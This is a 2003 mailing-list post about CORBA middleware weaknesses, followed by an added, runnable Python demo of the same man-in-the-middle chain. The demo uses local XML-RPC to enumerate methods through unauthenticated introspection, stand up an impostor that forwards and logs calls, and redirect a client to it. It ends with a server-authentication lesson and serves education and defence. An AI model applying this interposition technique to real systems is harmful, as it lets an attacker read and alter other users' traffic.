Re: middleware corba vulnerabilities: do they exist?
william fitzgerald wrote:
...
> I have been researching corba and corba security as a hobby recently. Corba
I conducted some attacks on a CORBA server system in an exercise in
1999 (so the data is old), but I don't believe the basic problem has
been fixed. The "application" involved serving outside clients with
large files and the ability to view them from the CORBA server. The
outside clients were served through a stateful, proxying firewall using
SSL. Inside clients were able to edit the large files. Both clients
had an additional security step wherein they identified themselves via
pre-shared SSL keys to the CORBA server to access the large file
viewing/editing methods.
I used Dynamic Invocation Interface (which was not protected) to
determine the methods served by the CORBA server. This discovery
function is available in one form or another in all middleware (Java
RMI, DCOM, CORBA) and a major help to an attacker. I wrote IDL to match
the methods, compiled that into a new set of methods and then wrote a
new CORBA server application of my own that duplicated the interfaces.
My server simply used the same methods to access the real server. From
there it was a simple DNS spoof to step in between a client and the real
CORBA server.
Middleware weaknesses lie in the need to advertise, find, broker, and
trade services as well as the fact that they depend upon the network
infrastructure to be trustworthy. In addition, CORBA applications
written in C or C++ are subject to standard coding error
vulnerabilities. Another thing to look for in a middleware
implementation is any sort of remote program invocation. This can be
done very insecurely.
--
Ray Parks rcparks@sandia.gov
IDART Project Lead Voice:505-844-4024
IORTA Department Fax:505-844-9641
http://www.sandia.gov/idart Pager:800-690-5288
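The attack chain described in the post (enumerate the interface through the unprotected discovery function, stand up a server of your own that duplicates it and forwards to the real one, then redirect the client) as an added, runnable example; this is not code from the post, from IDART, or from any of the middleware named in it. The standard-library XML-RPC modules stand in for a CORBA ORB so it runs offline, so the discovery call is system.listMethods rather than DII or the interface repository, and the "DNS spoof" is simply pointing the client at the impostor's port. The file service, its data and the client are constructed for the example.

```python
"""Interposition against an RPC middleware, following the three steps in the post.

XML-RPC from the standard library stands in for CORBA (no ORB is needed), so the
script runs offline; the structure of the attack is the same:
  1. use the middleware's own discovery function to enumerate the server's methods
     (system.listMethods here, DII / the interface repository for CORBA),
  2. build an impostor server that mirrors that interface and forwards every call
     to the real server, recording what passes through,
  3. get the victim client to talk to the impostor (a DNS spoof in the post; here
     the client is simply pointed at the impostor's port).
Server, data and client are all constructed for this example.
"""
import threading
from xmlrpc.client import ServerProxy
from xmlrpc.server import SimpleXMLRPCServer

# Constructed stand-in for the "large file" store behind the real server.
FILES = {"report.txt": "quarterly numbers: 42"}


class FileService:
    """The real server's interface (constructed; mirrors the post's view/edit methods)."""

    def list_files(self):
        return sorted(FILES)

    def view_file(self, name):
        return FILES[name]

    def edit_file(self, name, contents):
        FILES[name] = contents
        return True


def _serve(server):
    """Run an XML-RPC server on a background thread and return its URL."""
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d" % server.server_address[1]


def start_real_server():
    server = SimpleXMLRPCServer(("127.0.0.1", 0), logRequests=False)
    # The discovery function the post warns about: unauthenticated introspection.
    server.register_introspection_functions()
    server.register_instance(FileService())
    return server


def discover_interface(url):
    """Step 1: enumerate the served methods through the middleware's discovery call."""
    methods = ServerProxy(url).system.listMethods()
    return [m for m in methods if not m.startswith("system.")]


class Impostor:
    """Step 2: a server that advertises the discovered interface and forwards calls."""

    def __init__(self, real_url, methods):
        self.real = ServerProxy(real_url)
        self.methods = set(methods)
        self.log = []                        # everything the victim sent through us
        self.server = SimpleXMLRPCServer(("127.0.0.1", 0), logRequests=False)
        self.server.register_introspection_functions()
        self.server.register_instance(self)  # _dispatch/_listMethods below take over

    def _listMethods(self):
        # Make the impostor look identical to the real server under introspection.
        return sorted(self.methods)

    def _dispatch(self, method, params):
        if method not in self.methods:
            raise Exception('method "%s" is not supported' % method)
        self.log.append((method, params))    # record (or alter) the call in transit
        return getattr(self.real, method)(*params)


def run_demo():
    """Carry out the three steps and return what each side saw."""
    real = start_real_server()
    real_url = _serve(real)

    methods = discover_interface(real_url)                  # step 1
    impostor = Impostor(real_url, methods)                  # step 2
    impostor_url = _serve(impostor.server)

    victim = ServerProxy(impostor_url)                      # step 3 (redirected client)
    seen = victim.view_file("report.txt")
    victim.edit_file("report.txt", "edited through the impostor")

    result = {
        "discovered": methods,
        "impostor_advertises": discover_interface(impostor_url),
        "victim_saw": seen,
        "intercepted": list(impostor.log),
        "real_server_now_holds": FILES["report.txt"],
    }
    for s in (impostor.server, real):
        s.shutdown()
        s.server_close()
    return result


if __name__ == "__main__":
    for key, value in run_demo().items():
        print("%-22s %r" % (key, value))
```

Two things to notice when running it: the impostor needs nothing but the discovery output to present an interface indistinguishable from the real one (introspecting either endpoint returns the same method list), and every view and edit the victim performs is visible to, and forwardable by, the impostor. Nothing in the protocol ties the client's session to the genuine endpoint; that has to come from authenticating the server, not only the client.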
Received on Fri Aug 8 18:06:52 2003
This archive was generated by hypermail 2.1.8
: Wed Aug 23 2006 - 14:07:40 EDT